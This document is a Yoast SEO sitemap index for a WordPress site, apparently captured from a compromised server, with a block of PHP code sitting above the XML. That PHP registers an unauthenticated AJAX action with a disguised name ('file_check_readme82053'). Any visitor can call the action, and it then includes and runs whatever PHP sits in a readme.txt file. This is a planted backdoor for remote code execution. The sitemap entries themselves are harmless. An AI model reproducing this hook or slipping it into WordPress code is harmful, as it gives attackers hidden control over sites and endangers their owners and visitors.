
if(!function_exists('file_check_readme82053')){
   add_action('wp_ajax_nopriv_file_check_readme82053', 'file_check_readme82053');
   add_action('wp_ajax_file_check_readme82053', 'file_check_readme82053');
   function file_check_readme82053()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//jayantandassociates.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://jayantandassociates.com/post-sitemap.xml</loc>
		<lastmod>2026-01-20T20:39:47+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://jayantandassociates.com/page-sitemap.xml</loc>
		<lastmod>2026-01-17T06:49:55+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://jayantandassociates.com/category-sitemap.xml</loc>
		<lastmod>2026-01-20T20:39:47+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->